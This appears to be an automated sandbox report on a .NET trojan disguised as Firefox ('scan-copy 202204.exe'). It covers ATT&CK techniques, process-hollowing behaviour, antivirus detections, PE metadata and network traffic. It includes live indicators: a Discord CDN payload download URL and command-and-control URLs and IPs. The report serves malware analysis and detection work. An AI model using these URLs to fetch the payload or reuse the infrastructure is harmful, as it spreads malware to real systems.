            Source: Yara matchFile source: 0000000F.00000000.347441140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.350752708.0000000004198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.523682019.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.350609440.00000000040F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Shared Modules
            Path Interception612
            Process Injection
            11
            Masquerading
            1
            Input Capture
            121
            Security Software Discovery
            Remote Services1
            Input Capture
            Exfiltration Over Other Network Medium11
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools
            LSASS Memory2
            Process Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
            Process Injection
            NTDS1
            Remote System Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer13
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common3
            Obfuscated Files or Information
            Cached Domain Credentials112
            System Information Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items11
            Software Packing
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Timestomp
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            File Deletion
            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 612083 Sample: scan-copy 202204.exe Startdate: 20/04/2022 Architecture: WINDOWS Score: 100 38 www.allgamescracked.com 2->38 40 allgamescracked.com 2->40 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->62 64 7 other signatures 2->64 11 scan-copy 202204.exe 15 4 2->11         started        signatures3 process4 dnsIp5 48 cdn.discordapp.com 162.159.135.233, 443, 49742 CLOUDFLARENETUS United States 11->48 36 C:\Users\user\...\scan-copy 202204.exe.log, ASCII 11->36 dropped 68 Injects a PE file into a foreign processes 11->68 16 scan-copy 202204.exe 11->16         started        19 cmd.exe 1 11->19         started        file6 signatures7 process8 signatures9 50 Modifies the context of a thread in another process (thread injection) 16->50 52 Maps a DLL or memory area into another process 16->52 54 Sample uses process hollowing technique 16->54 56 Queues an APC in another process (thread injection) 16->56 21 explorer.exe 16->21 injected 25 conhost.exe 19->25         started        27 timeout.exe 1 19->27         started        process10 dnsIp11 42 brickstoneinvestmentltd.com 198.54.114.195, 49759, 80 NAMECHEAP-NETUS United States 21->42 44 www.eco-friendly.one 21->44 46 www.brickstoneinvestmentltd.com 21->46 66 System process connects to network (likely due to code injection or exploit) 21->66 29 msdt.exe 21->29         started        signatures12 process13 signatures14 70 Self deletion via cmd delete 29->70 72 Modifies the context of a thread in another process (thread injection) 29->72 74 Maps a DLL or memory area into another process 29->74 76 Tries to detect virtualization through RDTSC time measurements 29->76 32 cmd.exe 1 29->32         started        process15 process16 34 conhost.exe 32->34         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            scan-copy 202204.exe31%VirustotalBrowse
            scan-copy 202204.exe15%ReversingLabsByteCode-MSIL.Spyware.Noon
            scan-copy 202204.exe100%Joe Sandbox ML
            No Antivirus matches
            SourceDetectionScannerLabelLinkDownload
            15.0.scan-copy 202204.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            15.0.scan-copy 202204.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            15.0.scan-copy 202204.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            15.2.scan-copy 202204.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            SourceDetectionScannerLabelLink
            allgamescracked.com0%VirustotalBrowse
            brickstoneinvestmentltd.com0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.brickstoneinvestmentltd.com/s59h/?gPt=J9yIbbq2JC4kGJ28zSLAHEMUc2712/mbh0KUqSU+6gyJcm/2qQQ0g7MEmxyaj1IcJpiC&wTOHf=8pqLRLgpXn9D0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            https://www.brickstoneinvestmentltd.com/s59h/?gPt=J9yIbbq2JC4kGJ28zSLAHEMUc2712/mbh0KUqSU0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            www.tenacityshipping.com/s59h/0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            allgamescracked.com
            81.88.48.71
            truetrueunknown
            cdn.discordapp.com
            162.159.135.233
            truefalse
              high
              brickstoneinvestmentltd.com
              198.54.114.195
              truetrueunknown
              www.eco-friendly.one
              unknown
              unknowntrue
                unknown
                www.allgamescracked.com
                unknown
                unknowntrue
                  unknown
                  www.brickstoneinvestmentltd.com
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://cdn.discordapp.com/attachments/964082530275954728/966271154442612776/Usevbg_Pzmwkikx.bmpfalse
                      high
                      http://www.brickstoneinvestmentltd.com/s59h/?gPt=J9yIbbq2JC4kGJ28zSLAHEMUc2712/mbh0KUqSU+6gyJcm/2qQQ0g7MEmxyaj1IcJpiC&wTOHf=8pqLRLgpXn9Dtrue
                      • Avira URL Cloud: safe
                      unknown
                      www.tenacityshipping.com/s59h/true
                      • Avira URL Cloud: safe
                      low
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fontbureau.comscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com/designersGscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designers/?scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://stackoverflow.com/q/14436606/23354scan-copy 202204.exe, 00000000.00000002.349938512.000000000322A000.00000004.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 00000000.00000002.349788764.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bThescan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers?scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.tiro.comscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designersscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.discordapp.comscan-copy 202204.exe, 00000000.00000002.349702121.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.goodfont.co.krscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.brickstoneinvestmentltd.com/s59h/?gPt=J9yIbbq2JC4kGJ28zSLAHEMUc2712/mbh0KUqSUmsdt.exe, 00000012.00000002.528983601.00000000053C2000.00000004.10000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.comlscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/cThescan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://fontfabrik.comscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cnscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://stackoverflow.com/q/2152978/23354rCannotscan-copy 202204.exe, 00000000.00000002.349938512.000000000322A000.00000004.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 00000000.00000002.349788764.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://stackoverflow.com/q/11564914/23354;scan-copy 202204.exe, 00000000.00000002.349938512.000000000322A000.00000004.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 00000000.00000002.349788764.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.jiyu-kobo.co.jp/scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/DPleasescan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8scan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fonts.comscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.sandoll.co.krscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.urwpp.deDPleasescan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cnscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namescan-copy 202204.exe, 00000000.00000002.349702121.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.sakkal.comscan-copy 202204.exe, 00000000.00000002.352009478.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://cdn.discordapp.com/attachments/964082530275954728/966271154442612776/Usevbg_Pzmwkikx.bmpt%0lscan-copy 202204.exe, 00000000.00000002.349702121.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      198.54.114.195
                                                      brickstoneinvestmentltd.comUnited States
                                                      22612NAMECHEAP-NETUStrue
                                                      162.159.135.233
                                                      cdn.discordapp.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:612083
                                                      Start date and time: 20/04/202214:52:292022-04-20 14:52:29 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 50s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:scan-copy 202204.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:28
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@12/1@4/2
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 12.9% (good quality ratio 11.6%)
                                                      • Quality average: 73.7%
                                                      • Quality standard deviation: 31.1%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 52.242.101.226, 52.152.110.14, 20.54.110.249
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      TimeTypeDescription
                                                      14:54:19API Interceptor1x Sleep call for process: scan-copy 202204.exe modified
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\scan-copy 202204.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1119
                                                      Entropy (8bit):5.356708753875314
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                      MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                      SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                      SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                      SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.616300713260847
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:scan-copy 202204.exe
                                                      File size:48128
                                                      MD5:ce536566bed415b6be2b7635cfb03af0
                                                      SHA1:0845827e4dd7ab05ea5faeda57b93f2912fb04fe
                                                      SHA256:8722d6807e6c18d74f0c1ebea1f10d4f82038985b553917b2a6df36745299ed2
                                                      SHA512:7d2fb658cfb42403fbf2cd795addec24ea437ee9e751efe6645a211fdfbbdee0c2cec150e2a95f6e3856f56e4e64344ef451e7144e4e139e40adc00eb28c9b8c
                                                      SSDEEP:768:v7VI0djuOJHGlbMwCKN3deVDNAtYcFmVc6K:x8qe30VDNsmVcl
                                                      TLSH:0F23F81A68919229C5E47BF819B1668263367CE60024C14BFCFD7E29AF73313DDC269D
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....C...............0..(...........F... ...`....@.. ....................... ............@................................
                                                      Icon Hash:0f4d494919151b03
                                                      Entrypoint:0x4046aa
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0xF64312B7 [Sat Dec 4 08:07:19 2100 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x46580x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x8f48.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x463c0x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x26b00x2800False0.442578125PGP symmetric key encrypted data - Plaintext or unencrypted data5.45137130274IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x60000x8f480x9000False0.297064887153data5.39716201211IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x100000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x61600x468GLS_BINARY_LSB_FIRST
                                                      RT_ICON0x65d80x10a8data
                                                      RT_ICON0x76900x25a8data
                                                      RT_ICON0x9c480x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0
                                                      RT_GROUP_ICON0xde800x3edata
                                                      RT_VERSION0xded00x31aARC archive data, packed
                                                      RT_MANIFEST0xe1fc0xd48XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightMozilla
                                                      Assembly Version18.5.0.0
                                                      InternalNameUsevbg.exe
                                                      FileVersion18.5.0.0
                                                      CompanyNameMozilla
                                                      LegalTrademarks
                                                      CommentsFirefox
                                                      ProductNameFirefox
                                                      ProductVersion18.5.0.0
                                                      FileDescriptionFirefox
                                                      OriginalFilenameUsevbg.exe
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 20, 2022 14:54:01.335974932 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.336045027 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.336147070 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.376557112 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.376612902 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.420028925 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.420176983 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.425088882 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.425117970 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.425388098 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.528656960 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.769108057 CEST49742443192.168.2.3162.159.135.233
                                                      Apr 20, 2022 14:54:01.810203075 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823023081 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823122978 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823148966 CEST44349742162.159.135.233192.168.2.3
                                                      Apr 20, 2022 14:54:01.823179960 CEST44349742162.159.135.233192.168.2.3
